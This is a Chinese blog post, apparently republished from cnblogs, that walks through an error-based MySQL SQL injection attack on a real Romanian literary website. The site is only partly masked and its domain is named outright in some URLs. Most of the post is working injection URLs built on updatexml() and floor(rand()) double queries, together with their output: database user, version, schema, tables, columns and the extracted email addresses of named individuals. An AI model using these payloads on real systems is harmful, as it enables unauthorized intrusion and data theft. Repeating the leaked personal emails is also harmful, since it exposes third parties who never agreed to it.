经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
MySQL基于报错注入 - APT-101
来源:cnblogs  作者:APT-101  时间:2019/5/9 8:47:39  对本文有异议

 0x1 判断注入点:

http://www.xxxx.ro/s.php?id=1'

那么尝试闭合下单引号

http://www.xxxx.ro/s.php?id=1' --+

 

0x2 枚举下表的列

http://www.xxxx.ro/s.php?id=1' order by 4 --+

http://www.xxxx.ro/s.php?id=1' order by 3 --+

 

可以判断为3列

 

0x3 使用updatexml() 获取数据库的相关信息

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+

romanian_rowri@localhost

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

romanian_svc

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),1) --+

5.5.46-0ubuntu0.14.04.2

获取数据库名也可以通过以下方式:

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata  limit 1,1),0x7e),1) --+

 

0x4 获取库的表名

http://www.romanianwriters.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='romanian_svc'  limit 0,1),0x7e),1) --+

ra_autori

ra_carti

ra_carti_autori

ra_carti_critics

ra_carti_pdf

ra_contact

未发现相关后台的表,最后通过SQLmap确认确实没啥大的用处。

 

 

0x5 获取标的字段

ra_contact

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='ra_contact'  limit 0,1),0x7e),1) --+

id,nume,functie,email,poza

0x6 获取字段数据

http://www.xxxx.ro/s.php?id=1' and updatexml(1,concat(0x7e,(select distinct concat(0x23,id,0x3a,email,0x23) from ra_contact  limit 0,1),0x7e),1) --+

1:catalina.staicu@polirom.ro

4:lucian.teodorovici@polirom.ro

 

 

另外一种方式:

http://www.xxxx.ro/s.php?id=1' and '1'='1 #闭合

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

 

获取当前数据库:

http://www.romanianwriters.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

romanian_svc

获取当前数据库权限:

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

romanian_rowri@localhost

获取库对应的表

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

 

 

获取表的数据

http://www.xxxx.ro/s.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,id,0x3a,email,0x23) FROM romanian_svc.ra_contact limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

 

完结! 

 

原文链接:http://www.cnblogs.com/hack404/p/10834137.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号